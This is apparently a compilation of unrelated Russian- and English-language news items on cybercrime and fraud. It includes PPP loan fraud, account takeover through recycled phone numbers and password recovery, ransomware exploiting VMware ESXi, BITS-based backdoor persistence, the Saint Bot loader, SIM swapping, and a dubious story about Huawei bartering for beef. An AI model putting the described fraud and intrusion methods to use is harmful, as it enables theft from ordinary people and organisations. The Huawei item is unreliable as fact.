Пострадавшими в первоначальном обвинении, которое заняло 58 страниц, значатся 8 «финансовых учреждений», то есть банков, вклады в которые защищены Федеральной компанией Federal Deposit Insurance Company (“FDIC”). Эта компания страхует вклады до 250 тыс. долларов, и пострадавшие банки в деле не названы, а перечислены по буквам Английского алфавита), от А до Н. Зато названия компаний, на счета которых подсудимые обманом просили выдать займы помощи, занимают две страницы, а примером аферы можно взять приведенный в обвинении эпизод 16 апреля 2020 года. В этот день, утверждает обвинение, «Армен Хайрапетян с сообщниками», используя данные и номер карточки социального обеспечения (social security) реально существующего D.S., подали от его имени в банк заявление на помощь его бизнесу в сумме 182 637 долларов, ложно указав, что в строительной компании S. было 16 рабочих, которым он платил в среднем 75 035 долларов в месяц. Таких эпизодов у Хайрапетяна и Татьяны Дадян по 8; у Вахи Дадяна и Артура Айвазяна по 5, у его брата Ричарда Айвазяна 3; у Манука Григоряна с сообщниками 12 эпизодов и так далее – в обвинении, повторяю, 58 страниц, на которых они подробно перечислены. Примером отмывания денег можно привести перевод 155 тысяч долларов, полученных в виде помощи по программе PPP компанией с ее счета в одном банке на счет компании Runyan Tax в другом банке с пометкой Payroll, то есть «Зарплаты», и таких эпизодов в обвинении 5 – с 21 декабря 2020 по 13 января 2021 года.
Ричарда Айвазяна с женой Мариэттой арестовали 20 октября 2020 года в Майами, когда они возвращались домой после отдыха на карибских островах Тёркс и Кайкос, а его брата Артура с женой Тамарой – 5 ноября в их доме в Эйсино, пригороде Лос-Анджелеса. Дело шло к выборам, и газета The Washington Post отреагировала должным для нее образом. «За полгода до выборов президента, – написала газета, – в условиях поставленной на паузу из-за вируса кампании, от которой его сторонники ждут шумных ралли, чеки [помощи] послужат Трампу новой формой низовой политики. Чек – это осязаемый материальный символ, который приходит налогоплательщикам прямо в почтовый ящик».
Во втором пресс-релизе по этому делу федеральная прокуратура Центрального округа штата Калифорния снова просит всех, кому известно о подобных аферах, сообщать в Национальный центр борьбы с мошенничеством такого рода (Department of Justice’s National Center for Disaster Fraud) по «горячей», то есть, круглосуточной телефонной линии 866-720-5721 или по адресу в Интернете Web Complaint Form.

Filings Reveal ](https://cryptonews.com/news/fbi-seizes-nearly-2-million-of- digital-assets-three-months-new-filings-reveal.htm)
According to the filing, the Federal law enforcement agency seized Bitcoin (BTC), Ether (ETH), USD Tether (USDT), Monero (XMR), and DAI in its ongoing efforts to curb unlawful activities.
cryptonews.com
Мошеннические действия пары сожителей разоблачили сотрудники управления противодействия киберпреступлениям Днепропетровщины совместно со следственным отделом Криворожского управления полиции.
Двое жителей Кривого Рога, в возрасте 31-32 лет на сайтах мобильных операторов выбирали номера доступные к покупке. Среди предложений выискивали те, которые были ранее указаны в базах юридических лиц, или на платформах объявлений. Получив мобильный номер, злоумышленники устанавливали данные о личности, которая ранее его использовала. Для этого они авторизовались в различных мобильных приложениях, в частности почтовых служб, государственных, коммунальных и медицинских учреждений, используя функцию восстановления пароля. Собрав необходимую информацию - фигуранты получали доступ к системам онлайн-банкинга.
Кроме этого, сожители перекупали в коллекторских и микрофинансовых организаций базы данных граждан, в частности скан-копии их документов, и оформляли на них онлайн-кредиты. Сотрудники полиции проверяют причастность указанных организаций к противоправной деятельности.
Присвоенные деньги фигуранты переводили на подконтрольные карточки и обналичивали в банкоматах города. Общая сумма убытков достигает более 600 тысяч гривен.
В домах злоумышленников правоохранители совместно с полком полиции особого назначения провели обыски. По результатам изъято более 300 сим-карт, 90 банковских карточек, паспорта граждан Украины, мобильные телефоны, ноутбук и "черновые" записи. Также правоохранители изъяли оружие, патроны и вещество растительного происхождения, которые направили на проведение экспертных исследований. После выводов экспертизы будет решаться вопрос об открытии уголовного производства.
Уголовное производство расследуется по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до восьми лет лишения свободы. Сейчас решается вопрос об объявлении подозрения.
Следственные действия продолжаются.
По данным следствия, три организатора, в том числе доверенное лицо «вора в законе» по позывному Лаша Сван, разработали схемку по опрокидыванию мамонтов из Евросоюза. Для реализации схемы работяги открыли три call-центра в Днепропетровской области. Их оборудовали компами и поставили туда соответствующее ПО для ворка.
Прозвонщики представлялись сотрудниками полиции и банков, вводили лохмачей в заблуждение и узнавали данные карты. В дальнейшем скамеры выводили бабло на счета дропов. Еще одним способом обнала полученного профита было приобретение за границей разнообразной техники, которую реализовывали через магазин электроники в Днепре. Большинство опрокинутых из Латвии. По предварительной информации, оборот конторы составлял около 5 млн гривен в месяц.
В ходе 30 обысков по месту жительства работяг и офисам изъята компьютерная техника, мобильники, 200 тысяч гривен наличкой, черновики, оружие и авто. Общая сумма изъятого составляет 12 миллионов гривен.
Русскоязычная хак-группа APT29 (также известная под именами Cozy Bear, Nobelium или The Dukes) скомпрометировала центральный банк Королевства Дания и сохраняла доступ к сети финансового учреждения несколько месяцев, сообщает местное издание Version2.
Напомню, что ранее американские власти официально возложили ответственность за атаку на компанию SolarWinds именно на APT29 и российские спецслужбы. По данным властей, хакеры «использовали платформу SolarWinds Orion и другие ИТ- инфраструктуры в рамках широкомасштабной кибершпионской кампании».
Взлом SolarWinds стал одной из наиболее масштабных атак на цепочку поставок в истории. В декабре 2020 года стало известно, что неизвестные злоумышленники атаковали компанию и заразили ее платформу Orion малварью.
Согласно официальным данным, среди 300 000 клиентов SolarWinds только 33 000 использовали Orion, но недавно сообщалось, что хотя зараженная версия платформы и была установлена примерно у 18 000 клиентов, реально от атак пострадали лишь около 100 из них. Тем не менее, в результате этого инцидента жертвами хакеров стали такие гиганты, как Microsoft, Cisco, FireEye, а также множество правительственных агентств США, включая Госдеп, Министерство юстиции и Национальное управление по ядерной безопасности.
«Бэкдор SolarWinds в Национальном банке Дании был активен на протяжении семи месяцев, прежде чем атака была случайно обнаружена американской компанией Fire Eye», — заявляет Version2, ссылаясь на официальные документы, полученные от банка после запроса в рамках закона о свободе информации.
Хотя злоумышленники провели в сети банка долгое время, представители датского ЦБ уверяют, что не обнаружили каких-либо доказательств компрометации после этой стадии атаки (как это произошло с множеством других организаций, которые установили троянизированную версию Orion). Похоже, банк стал побочной жертвой более крупной хакерской операции и не представлял интереса для злоумышленников.
• Source: [https://www.version2.dk/artikel/dan...rdens-mest-sofistikerede- hackerangreb-1092886](https://www.version2.dk/artikel/danmarks-nationalbank- hacket-led-verdens-mest-sofistikerede-hackerangreb-1092886)
Правоохранители завершили досудебное расследование и направили в суд обвинительный акт в отношении фигуранта, который обманул граждан почти 300 000 гривен, создав фейковые магазины в соцсети. За содеянное ему грозит до восьми лет заключения. Об этом сообщают Экономические Новости со ссылкой на пресс- службу Департамента киберполиции Национальной полиции Украины.
Разоблачили противоправную деятельность злоумышленника сотрудники управления противодействия киберпреступности Киева совместно со следователями Шевченковского управления полиции.
19-летний парень создал страницу в соцсети, где продавал несуществующую брендовую одежду. Условием заказа была частичная или полная предоплата. На страницах, где было почти 20 000 подписчиков, он размещал положительные отзывы о своей работе. Однако после получения денег — подозреваемый «исчезал». Таким образом он обманул около 60 граждан. Общая сумма ущерба составляет 289 000 гривен.
Правонарушителю объявлено о подозрении по ч.3 ст.190 (мошенничество) Уголовного кодекса Украины. Ему грозит до восьми лет заключения. Правоохранители направили обвинительный акт в суд. Процессуальное руководство осуществляет Шевченковский окружная прокуратура Киева.
В МО МВД России «Железногорский» обратилась 49-летняя местная жительница, которая в Интернете увидела заманчивое предложение о возможности заработка.
Женщина перешла по ссылке, ввела анкетные данные и свой контактный номер. С ней сразу связались представители компании и увлекли в рассказ о заработке на криптовалюте. Потерпевшей предложение показалось перспективным, и она перевела на указанную карту крупную сумму денег. Через некоторое время аналитики сообщили, что для завершения сделки не хватает еще 188 000 рублей. Женщина и на этот раз пополнила чужой счет. Далее мошенники сообщили, что появилась возможность вывода первых денежных средств, но для этого необходимо оплатить налог, что женщина и сделала. По итогу, заявительница перевела мошенникам 1 128 000 рублей, так не получив взамен даже символической обещанной выплаты. После чего женщина поняла, что ее обманывают.
Возбужденно уголовное дело по факту «Мошенничество». Устанавливаются лица, причастные к совершению данного преступления.
ИБ-исследователи из компании Analyst1 подсчитали, что хакеры, стоящие за малварью Maze и Egregor, уже получили более 75 000 000 долларов в качестве выкупов от своих жертв. Данные компании основаны на транзакциях, которые исследователи смогли проследить в публичных блокчейнах.
Интересно, что выводы экспертов полностью согласуются с аналогичным отчетом компании Chainalysis, чьи аналитики полагают, что шифровальщик Maze — третий по прибыльности после Ryuk и Doppelpaymer.
Хак-группа Maze впервые заявила о себе в мае 2019 года, предлагая другим злоумышленникам малварь по схеме RaaS (Ransomware-as-a-Service, Шифровальщик- как-услуга). Хотя в то время множество групп вымогателей действовали аналогичным образом, Maze сделала себе имя, первой создав «сайт утечек», где хакеры перечисляли зараженные компании и публиковали похищенные у них данные. Такая тактика использовалась и используется вымогателями в качестве рычага давления на жертв.

По неизвестным причинам осенью 2020 года группировка прекратила работу шифровальщика Maze, и его место занял Egregor, работающий по все той же модели RaaS. Вскоре после этого многие исследователи начали называть группировку, стоящую за Maze и Egregor, Twisted Spider.
В настоящее время Maze и Egregor занимают второе и третье места по активности RaaS-сервисов, то есть за последний год именно они атаковали четверть всех жертв, фигурирующих на «сайтах утечек».
__https://twitter.com/x/status/1367705996332724224
В настоящее время преступники неактивны: группировка прекратила деятельность после того, как в середине февраля французские и украинские власти арестовали трех ее членов. Тогда издание The Record, со ссылкой на высокопоставленного сотрудника французской полиции, сообщало, что среди арестованных был один из ключевых членов группы.
Источник: xakep.ru/2021/04/12/maze-egregor/
В настоящее время группировками Ransomware эксплуатируются две уязвимости VMWare ESXi: CVE-2019-5544 и CVE-2020-3992.
По крайней мере, одна крупная группировка использует уязвимости в VMWare ESXi для установления контроля над виртуальными машинами, развернутыми в корпоративных средах, с последующим шифрованием их виртуальных жестких дисков.
Впервые обнаруженные в октябре прошлого года, эти атаки показали связь с преступной группировкой, использовавшей программу-вымогатель RansomExx.
По словам нескольких исследователей безопасности, с которыми беседовали представители ZDNet, данные свидетельствуют о том, что злоумышленники использовали уязвимости CVE-2019-5544 и CVE-2020-3992 в гипервизоре VMware ESXi, которые позволяют нескольким виртуальным машинам совместно использовать одно и то же пространство жесткого диска.
Обе ошибки влияют на протокол определения местоположения службы (Service Location Protocol, SLP), используемый устройствами одной сети для взаимного обнаружения (также входит в комплект ESXi).
Уязвимости позволяют злоумышленнику, находящемуся в той же сети, отправлять злонамеренные запросы SLP на устройство ESXi и устанавливать над ним контроль, даже если злоумышленнику не удалось скомпрометировать сервер VMWare vCenter, на который обычно инстансы ESXi отправляют отчеты.
В атаках, произошедших в прошлом году, группировка RansomExx была замечена в получении доступа к устройству в корпоративной сети и злоупотреблении этой начальной точкой входа для атаки на локальные инстансы ESXi и шифрования их виртуальных жестких дисков, используемых для хранения данных с различных виртуальных машин, вызывая массовые сбои в работе компаний, поскольку виртуальные диски ESXi обычно используются для централизации данных из множества других систем.
Сообщения об этих атаках были задокументированы на Reddit, опубликованы в Twitter, представлены на конференции по безопасности в прошлом месяце и подтверждены в различных интервью для ZDNet в течение последних двух месяцев.
_Угроза для Intel - выявляйте и исправляйте уязвимости VMware ESX CVE-2019-5544 и CVE-2020-3992.
Группировка вымогателей использует их для обхода всей системы безопасности ОС
Windows, выключая виртуальные машины и шифруя VMDK непосредственно на
гипервизоре.
- Kevin Beaumont (@GossiTheDog) 7 ноября 2020 г._
На данный момент только группировка RansomExx (также известная как Defray777) была замечена в злоупотреблении этим приемом, но в таинственном обновлении прошлого месяца оператор программы-вымогателя Babuk Locker также объявил о пугающе похожей функции - хотя подтвержденных успешных атак еще зафиксировано не было.
Автор BabukLocker утверждает, что их программа-вымогатель теперь может
шифровать системы на базе NIX, устройства NAS и рабочие станции VMWare eSXI
pic.twitter.com/yR3crnnUOW
- Catalin Cimpanu (@campuscodi) 27 января 2021 г.
Системным администраторам в компаниях, которые используют VMWare ESXi для управления дисковым пространством, используемым их виртуальными машинами, рекомендуется либо установить рекомендуемые патчи ESXi, либо отключить поддержку SLP для предотвращения атак, если данный протокол не используется.
Источник:[https://www.zdnet.com/article/ranso...o-encrypt-virtual-hard- disks/#ftag=RSSbaffb68](https://www.zdnet.com/article/ransomware-gangs-are- abusing-vmware-esxi-exploits-to-encrypt-virtual-hard-disks/#ftag=RSSbaffb68)
Неизвестный украл и продал «огромное количество» выпущенных на Ethereum- платформе Roll токенов, сообщил исследователь The Block Игорь Игамбердиев. Злоумышленник получил почти 3 000 ETH (~$5,7 млн).
1/5
Two hours ago, someone sold a huge amount of social tokens issued on Roll platform.
As a result, an attacker earned almost 3k ETH ($5.7M), of which 700 have already been sent to Tornado Cash.
Most of social token prices dumped as a result. pic.twitter.com/WmdMogBBnd
— Igor Igamberdiev (@FrankResearcher) March 14, 2021Click to expand...
700 ETH он уже отправил в миксер Tornado Cash.
Roll позволяет любому пользователю выпустить собственные фирменные токены на блокчейне Ethereum. Актив он может использовать для монетизации активности в рамках своего сообщества. Платформа называет такие монеты «социальными деньгами».
Максимальная эмиссия токена на Roll составляет 10 млн единиц. Первые 2 млн пользователь получает сразу, остальное количество выпускается в течение трех лет.
Пострадавший адрес принадлежит платформе, поэтому эксперт предположил либо компрометацию приватного ключа, либо действия инсайдера. Неизвестно, получил ли злоумышленник доступ к другим элементам инфраструктуры Roll, добавил исследователь.
Цена большинства затронутых инцидентом токенов значительно упала.
В кошельке осталось некоторое количество малоизвестных монет, которые злоумышленник еще может реализовать, отметил Игамбердиев.
Суд вынес приговор Вальтеру Дельгатти, атакующему системы госструктур с 2019 года.
В понедельник 10-й Федеральный Суд Бразилии вынес вердикт по делу Вальтера Дельгатти. Хакеру, арестованному еще в 2019 году по подозрению во взломе Telegram-аккаунтов высокопоставленных чиновников, было назначено 20 лет тюремного заключения. Жертвами в том числе стали участники операции «Лава Жато», одной из самых крупных и долгих антикоррупционных компаний в истории страны. Решение суда, однако, может быть обжаловано.
В числе пострадавших оказались и бывший министр юстиции Серхио Моро, экс- министр экономики Пауло Гедеш, а также советники Национального Совета Общественных Прокуроров.
Известно, что Дельгатти планировал продавать перехваченные переписки политиков журналистам. Версию защиты о том, что его действия были мотивированы «борьбой за справедливость», преступник опроверг. «После того, как представители медиа отказались платить за предложенные материалы, у Дельгатти ослаб интерес к получению дохода» — объяснили в суде.
Мужчину также обвиняют в краже банковских данных различных жертв и продаже их в специальных киберпреступных чатах. Часто хакер выдавал себя за специалиста по безопасности банка и убеждал клиента установить на свой компьютер обновление, которое оказывалось вредоносным ПО.
В этом месяце Дельгатти был арестован Федеральной полицией по еще одному делу, связанному со взломом систем Национального Совета Юстиции. По данным расследования, преступник создал поддельный ордер на арест Александра Де Мораеса, члена Верховного Федерального Суда. Сейчас полиция расследует возможное соучастие в этом деле конгрессмена Карлы Замбелли.
source: agenciabrasil.ebc.com.br/en/justica/noticia/2023-08/federal-court- sentences-hacker-walter-delgatti-20-year-prison-term
Первую в мире олимпиаду по искусственному интеллекту для школьников выиграли россияне. Медали нашей команде пришлось получать под флагом Центрального университета, а не под государственным флагом России.
Победа российской команды
На первой в истории Международной олимпиаде по искусственному интеллекту (IOAI) среди старшеклассников, которая проходила с 9 по 14 августа 2024 г. в Болгарии, российская сборная оставила позади команды из 39 стран, сообщило Минцифры в своем Telegram-канале, в посте, созданном при помощи ИИ.
Сборная России в составе Никиты Курлаева, Андрея Грицаева, Андрея Громыко и Анастасии Гайнуллиной завоевала золотые медали в научном туре конкурса, получила серебро в практическом этапе и стала первой по сумме баллов за оба этапа, говорится в сообщении министерства. Однако на сайте олимпиады российская сборная названа командой «Летово». Национальный флаг России не был допущен к соревнованиям, а «Летово» — это название московской школы, учащиеся и выпускники которой принимали участи в конкурсе и получили медали.
В сообщении Правительства России, тоже в Telegram, российских школьников поздравил вице-премьер Дмитрий Чернышенко: «Вы доказали себе и всему миру, что Россия в надежных руках будущего поколения, готового решать самые сложные задачи и открывать новые горизонты в сфере технологий».
Минцифры также пожелало россиянам победы на следующей олимпиаде по ИИ в Китае.
Подготовкой нашей сборной занимался Центральный университет. Это первый в России, как указано на сатйте «Т-Банка», вуз на основе STEM‑модели (science, technology, engineering, mathematics), созданный при поддержке крупнейших российских компаний: «Тинькофф», Positive Technologies, VK, МТС и др.
Как проходили соревнования
Научный тур включал три задачи, имитирующие реальные научные исследования в области ИИ. Для их решения требовались навыки программирования, знание библиотек Python и понимание основ машинного обучения. Сборная России в этом туре набрала абсолютное большинство конкурсных баллов.
На практическом этапе команды занимались разработкой и проведением экспериментов о поведении программного обеспечения ИИ: ChatGPT, Dalle-2 и др.
В финале помимо сборной России приняли участие школьники из Китай, Японию, Канаду, Швецию, Нидерланды, США и др.
Другие успехи россиян в ИТ-соревнованиях
На международной олимпиаде 2023 г. по информатике (IOI) в Венгрии, российские школьники тоже блеснули — они получили четыре золотые медали из четырех возможных. В 2021 г. и в 2022 г. у нас было по три золотые и по одной серебряной медали.
В 2023 г. нашей команде тоже пришлось выступать под нейтральным флагом. Национальный флаг России не был допущен на соревнования. Победителями стали Гимран Абдуллин, лицей-интернат № 2, г. Казань; Иван Пискарев, школа № 2086, г. Москва; Валерий Родионов, Лицей имени Н.И. Лобачевского КФУ, г. Казань; Антон Степанов, лицей «Вторая школа» имени В.Ф. Овчинникова», г. Москва.
В апреле 2024 г. CNews писал о победе студентов факультета компьютерных наук, основанного совместно «Яндексом» и НИУ ВШЭ на 47 финале всемирного чемпионата по программированию среди университетских команд ICPC (International Collegiate Programming Contest) за 2023 г. Россияне получили также золотые медали в 46 финале. Последние этапы чемпионата сразу за 2022-2023 гг. (46 и 47 финал, соответственно) проходили в египетском городе Луксор с 14 по 19 апреля 2024 г.
Huawei стал крупнейшим импортёром говядины в Китай из-за санкций США.
Санкции ограничили возможность США и Ес оплачивать товары и оборудование Huawei деньгами, поэтому в качестве альтернативы компания начала принимать оплату продуктами: мясом, алкоголем и рыбой.
Продуктов стало слишком много и Huawei пришлось открыть отдельный бренд, продающий мясо, вино, рыбу и ряд других продуктов.
Тысячи лет эволюции снова привели к бартеру.
Гражданин Китая приговорен к 2,5 года тюремного заключения за кражу у сервисной компании 55 POS-терминалов. Как сообщает местный новостной портал QQ, в он продал эти устройства группировке кардеров, которые смогли с их помощью украсть более 300 миллионов юаней (примерно 43,6 миллиона долларов). На этой афере китаец по фамилии Чи смог заработать около 400 тысяч юаней (58 тысяч долларов), но размер наложенного на него штрафа составит 50 тысяч юаней (7,2 тысячи долларов)
Схема заключалась в том, что терминалы внедрялись на реальные предприятия, отдельные сотрудники которых могли быть в доле с кардерами. После того, как суммарный оборот по каждому устройству достигал 20 миллионов (для повышения размера комиссии), Чи помогал перенаправить часть средств в руки группировки через перепривязку карточек.
Кроме того, как минимум в одном из случаев речь идет о краже 200 тысяч юаней у конкретного человека. Списания его средств производились через интернет- транзакции. Также члены группы оформляли на фальшивые карты возвраты и крали комиссию за пользование терминалом.
source: new.qq.com/rain/a/20230410A06J8K00
В Астраханской области осужден кибермошенник, похитивший у белорусов более Br3 тыс., сообщает БЕЛТА со ссылкой на управление взаимодействия со СМИ и редакционной деятельности Генеральной прокуратуры.
По материалам дела, фигурант, действуя в составе группы лиц, пытался похитить у граждан Беларуси более Br3,7 тыс., но завладел более Br3 тыс. Он с использованием компьютерной техники сообщал потерпевшим, что МВД Беларуси якобы подвергло их административному взысканию в виде штрафа за просмотр и хранение порнографических материалов и вскоре их компьютеры и мобильные телефоны будут заблокированы.
Реализовать принцип неотвратимости ответственности за преступление и обеспечить восстановление нарушенных прав и законных интересов потерпевших позволило конструктивное международное сотрудничество генпрокуратур Беларуси и России. На основании Конвенции государств - участников СНГ о правовой помощи и правовых отношениях по гражданским, семейным и уголовным делам от 22 января 1993 года Генеральная прокуратура Беларуси направила в Генпрокуратуру России материалы уголовного дела о покушении на мошенничество и компьютерном саботаже.
В результате на территории России Наримановский районный суд Астраханской области вынес в отношении мужчины обвинительный приговор, который вступил в законную силу.
Опытные киберпреступники используют в атаках новый способ скрытой установки вредоносной программы на компьютеры под управлением Windows. Для этого злоумышленники задействуют компонент операционной системы — Background Intelligent Transfer Service (BITS).
Речь идёт о хорошо подготовленных атаках, в которых участвуют кастомные бэкдоры вроде KEGTAP. С помощью таких зловредов преступники нападали на медицинские учреждения в 2020 году и разворачивали впоследствии программу- вымогатель Ryuk.
Новое исследование специалистов FireEye описывает ранее неизвестный метод внедрения и закрепления бэкдора в системе. Для этого, как мы отметили выше, используется BITS, присутствующий в Windows с 2000 года.
Как известно, BITS — незаменимая служба для работы таких важных компонентов операционной системы, как встроенный антивирус Microsoft Defender и Windows Update. Работая в фоне, BITS также обеспечивает передачу файлов между клиентом и HTTP-сервером.
«Когда вредоносные приложения создают задания BITS, любые файлы загружаются или выгружаются в контексте процесса службы. Такая тактика хорошо подходит для обхода защитных мер вроде файрволов, которые могут блокировать вредоносную или неизвестную активность», — пишут специалисты FireEye.
Исследователи также описали реальной пример подобной атаки: для установки шифровальщика Ryuk злоумышленники использовали службу BITS, с помощью которой создали задание с именем «System update» (обновление системы). Именно так запускался файл mail.exe, внедряющий бэкдор KEGTAP.
«Атакующие настраивали вредоносное задание BITS на HTTP-передачу несуществующего файла с localhost. Поскольку на деле никакого файла не было, BITS запускал команду для отображения уведомления, которая в этом случае оказывалась вредоносом KEGTAP», — объясняют эксперты.
• Source: [https://www.fireeye.com/blog/threat...-background-intelligent- transfer-service.html](https://www.fireeye.com/blog/threat- research/2021/03/attacker-use-of-windows-background-intelligent-transfer- service.html)
Прокуратурой Калужской области утверждено обвинительное заключение в отношении 24-летней жительницы г. Калуги по факту использования вредоносного программного обеспечения.
В ходе предварительного следствия установлено, что обвиняемая в сентябре прошлого года, находясь у себя дома, запустила на персональном компьютере вредоносное программное обеспечение, заведомо предназначенное для поиска уязвимостей и нейтрализации средств защиты компьютерной информации.
Атака осуществлялась в отношении официального сайта одной из школ г. Калуги и колледжа, в которых она ранее обучалась.
Целью этих действий была нейтрализации средств защиты компьютерной информации, а именно получение доступа к администрированию и изменению информации, размещённой на официальных сайтах образовательных учреждений.
Деяния квалифицированы по ч. 1 ст. 273 УК РФ – использование компьютерных программ, заведомо предназначенных для несанкционированной нейтрализации средств защиты компьютерной информации.
Уголовное дело направлено в суд.
Санкция статьи предусматривает максимальное наказание в виде лишения свободы на срок до четырёх лет со штрафом в размере до двухсот тысяч рублей.
• Source: <https://epp.genproc.gov.ru/web/proc_40/mass- media/news?item=60529478>
Хакер под псевдонимом Monsieur Personne решил доказать, что, несмотря на хвалебные отзывы СМИ о невзаимозаменяемых токенах (non-fungible token, NFT), на самом деле они не являются такими уж уникальными и безопасными.
С целью продемонстрировать «абсурдность ситуации с ажиотажем вокруг NFT» хакер создает поддельные копии самых дорогих в мире NFT. В частности, он подделал NFT цифровой картины Everydays: The First 5000 Days американского художника Майкла Винкельманна (Michael Winkelmann), известного как Beeple, которая была продана в прошлом месяце на аукционе Christie’s за $69,34 млн.
После ряда неудачных попыток предупредить медиа- и ИБ-компании о том, что они ошибаются в безопасности NFT, Monsieur Personne решил взять дело в свои руки. Сначала хакер поделился своими соображениями с ограниченным кругом лиц, но ему никто не поверил, поэтому он решил показать свою концепцию в действии.
Стоит отметить, что речь идет не о подделке содержимого NFT – кто угодно может скачать из интернета точную копию картины Beeple, просто загуглив ее название. Смотреть на цифровую картину или владеть ее изображением также может каждый – это все равно, что владеть репродукцией произведения искусства. Намного сложнее предоставить криптографические доказательства того, что именно то или иное лицо является владельцем оригинального произведения искусства.
Таким криптографическим доказательством является уникальный NFT, созданный самим художником. Поскольку токен хранится в блокчейне, ожидается, что его история транзакций надежно защищена, но Monsieur Personne решил развеять это заблуждение.
Хакер создал собственный NFT в блокчейне Ethereum, где также хранится оригинальный NFT художника Beeple. Он сконфигурировал компоненты своего NFT таким образом, чтобы его идентификатор и история транзакций были похожи на токен Beeple. Другими словами, хакер не является владельцем оригинального NFT, но рядовому зрителю может показаться обратное.
Что немаловажно, созданный Monsieur Personne токен не ставит под угрозу подлинность оригинальной картины. Тем не менее, пользователям будет довольно трудно определить, где настоящая картина, а где подделка.
American telecommunications provider T-Mobile has disclosed a data breach after an unknown number of customers were apparently affected by SIM swap attacks.
SIM swap fraud (or SIM hijacking) allows scammers to take control of targets'
phone numbers after porting them using social engineering or after bribing
mobile operator employees to a SIM controlled by the fraudsters.
Subsequently, they receive the victims' messages and calls which allows for
easily bypassing SMS-based multi-factor authentication (MFA), stealing user
credentials, as well taking over the victims' online service accounts.
The criminals can then log into the victims' bank accounts to steal money, change account passwords, and even locking the victims out of their own accounts.
The FBI [shared guidance](http://www.fbi.gov/contact-us/field- offices/sanfrancisco/news/press-releases/fbi-san-francisco-warns-the-public- of-the-dangers-of-sim-swapping) on how to defend against SIM swapping following an increase in the number of SIM hijacking attacks targeting cryptocurrency adopters and investors.
In a [data breach notice](https://beta.documentcloud.org/documents/20492859-t-mobile- feb-2021-bc-data-breach) sent to impacted customers on February 9, 2021, and filed with US attorney generals' offices, T-Mobile revealed that an unknown attacker gained access to customers' account information, including personal info and personal identification numbers (PINs).
As the attackers were able to port numbers, it is not clear if they gained access to an employee's account or did it through the compromised users' accounts.
A T-Mobile spokesperson was not available for comment when contacted by BleepingComputer earlier today.
"[A]n unknown actor gained access to certain account information. It appears the actor may then have used this information to port your line to a different carrier without your authorization," T-Mobile said.
"T-Mobile identified this activity—terminated the unauthorized access, and
implemented measures to protect against reoccurrence."
The information accessed by the hackers might have included customers' full
names, addresses, email addresses, account numbers, social security numbers
(SSNs), account personal identification numbers (PIN), account security
questions and answers, date of birth, plan information, and the number of
lines subscribed to their accounts.
"T-Mobile quickly identified and terminated the unauthorized activity; however
we do recommend that you change your customer account PIN," the company also
said.
Impacted T-Mobile customers are advised to change their account's password, PIN, as well as their security questions and answers.
T-Mobile is offering two years of free credit monitoring and identity theft detection services through Transunion's myTrueIdentity.
This is the fifth data breach disclosed by T-Mobile during the last four
years, all of them being reported after hackers gained access to customers'
data.
T-Mobile previously suffered from breaches in 2018 when millions of customers'
info was accessed by hackers and in 2019 after exposing prepaid customers'
data.
Last year, the company disclosed two more breaches, in March 2020, when attackers gained access to customer and employee data.
In December 2020, T-Mobile's suffered another data breach after unknown threat actors again accessed customers' phone numbers and call records.
Эксперты Malwarebytes опубликовали результаты анализа недавно обнаруженной программы-загрузчика для Windows, используемой для распространения аналогичных зловредов, а также инфостилеров. Набор функций Saint Bot пока скромен и стандартен, однако этот проект активно развивается и с учетом возможности загрузки любых вредоносных файлов может в скором времени превратиться в серьезную угрозу.
Самый ранний из выявленных семплов Saint Bot был скомпилирован в январе этого года. Распространяется он через спам-рассылки и уже засветился в целевых атаках на правительственные учреждения. Примечательно, что вредонос умеет определять не только присутствие отладчика или виртуальной машины, но также географическое местоположение жертвы и отказывается выполнять свои функции, если та проживает в Румынии, Белоруссии, Армении, Казахстане, России, Молдавии или на Украине.
Цепочка заражения запускается при открытии ZIP-вложения — аналитикам из Malwarebytes попался образец с именем bitcoin.zip. Этот архив содержал два файла: .lnk и .txt; судя по названию, первый указывал короткий путь к биткоин- кошельку, а второй содержал пароль к нему. При проверке оказалось, что LNK- файл включает скрипт PowerShell, предназначенный для загрузки дроппера WindowsUpdate.exe со стороннего сервера, доступного по вшитой в код ссылке.
Этот исполнимый код загружает в папку временных файлов другой «экзешник» (InstallUtil.exe), который, в свою очередь, загружает туда же файлы def.exe и putty.exe и пытается запустить их на исполнение с высокими привилегиями. Анализ показал, что def.exe отвечает за блокировку Microsoft Defender, а putty.exe представляет собой основной компонент зловреда, устанавливающий связь с командным сервером.
Все коды, задействованные в атаке, обфусцированы. Итоговая полезная нагрузка прописывается в реестре на автозапуск под именем одного из легитимных приложений, присутствующих в зараженной системе. При первом запуске вредоносный код загружается в память донорского процесса и работает, таким образом, незаметно для жертвы.
Присутствие Saint Bot могут выдать только запросы к C2-серверу или результаты таких обращений. Количество команд, выполняемых зловредом, пока невелико: загрузка файлов из указанных источников, загрузка обновлений и деинсталляция.
Экспертам также удалось добраться до исходников панели управления Saint Bot. Как оказалось, ее возможности весьма ограниченны. При отдаче дополнительной полезной нагрузки оператор бота имеет возможность выбрать папку для ее сохранения — ProgramData, AppData или Temp. Он может также установить ряд фильтров и с их помощью выбирать, на какие машины раздавать чужих зловредов.
Примечательно, что все вредоносные файлы, загружаемые проанализированным образцом Saint Bot, размещались в CDN-сети Discord. Этот веб-сервис позволяет получать доступ к таким ресурсам по вшитому URL, и установка мессенджера при этом необязательна.
• Source: <https://blog.malwarebytes.com/threat-analysis/2021/04/a-deep-dive- into-saint-bot-downloader/>
Прокуратура Брестской области направила в суд Московского района Бреста уголовное дело по обвинению 18-летнего брестчанина Г., которому инкриминированы мошенничество и хищение денежных средств путем модификации компьютерной информации, а также покушение на хищение тем же способом.
Установлено, что обвиняемый в июне 2020 года нашел уязвимость в одной из систем расчетов с использованием электронных денежных средств, что позволило ему похитить с банковских платежных карт 78 потерпевших около 12 тысяч рублей. Кроме того, он покушался на хищение других граждан на сумму более 32 тысяч рублей, однако за недостаточностью денежных средств транзакции были отклонены.
Ущерб, причиненный гражданам, возмещен страховыми организациями, уязвимость платежной системы устранена.
Дело находилось в производстве управления Следственного комитета Республики Беларусь Брестской области.
После изучения материалов уголовного дела в прокуратуре Брестской области пришли к выводу об обоснованности обвинения, достаточности собранных доказательств, всестороннем исследовании обстоятельств преступления. Согласились с квалификацией содеянного по ч. 2 ст. 209, ч. 2 ст. 212, ч. 1 ст. 14 и ч. 2 ст. 212 Уголовного кодекса Республики Беларусь.
Избранная ранее мера пресечения в виде заключения под стражу при направлении дела в суд оставлена без изменения.
